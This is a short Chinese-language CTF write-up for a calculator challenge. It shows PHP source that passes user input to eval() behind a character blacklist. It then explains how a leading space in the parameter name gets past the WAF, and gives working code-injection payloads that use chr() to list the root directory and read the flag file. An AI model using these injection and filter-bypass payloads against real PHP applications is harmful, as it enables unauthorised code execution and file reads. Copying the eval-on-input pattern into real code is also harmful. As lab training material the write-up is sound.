f12找到一段ajax请求代码
$(‘#calc‘).submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), type:‘GET‘, success:function(data){ $("#result").html(`<div class="alert alert-success"> <strong>答案:</strong>${data} </div>`); }, error:function(){ alert("这啥?算不来!"); } }) return false; })
进入calc.php
<?php error_reporting(0); if(!isset($_GET[‘num‘])){ show_source(__FILE__); }else{ $str = $_GET[‘num‘]; $blacklist = [‘ ‘, ‘\t‘, ‘\r‘, ‘\n‘,‘\‘‘, ‘"‘, ‘`‘, ‘\[‘, ‘\]‘,‘\$‘,‘\\‘,‘\^‘]; foreach ($blacklist as $blackitem) { if (preg_match(‘/‘ . $blackitem . ‘/m‘, $str)) { die("what are you want to do?"); } } eval(‘echo ‘.$str.‘;‘); } ?>
关键点在eval函数这里,明显是代码执行。
我本以为这就是题目中所说的waf,结果输了字母也被禁掉了。
看来还有防护手段。这题使用率php字符串解析特性。
什么是字符串解析特性呢:
PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:
1.删除空白符
2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】
所以说我们将变量num改为 num(在前面加了个空格),waf认为这俩不是一个变量,不会对其进行防护,
但是后台php在解析的时候,会先去掉空格,这样我们的php代码就能够执行了。
? num=phpinfo()
绕waf成功。
接下来就是绕这个后台检测了。先列一下根目录吧,flag一般都放在根目录。
? num=1;var_dump(scandir(chr(47)))
chr(47)绕过‘/‘检测。
目录是f1agg不是flagg,做题可要看清楚1和l。
? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
最后得到flag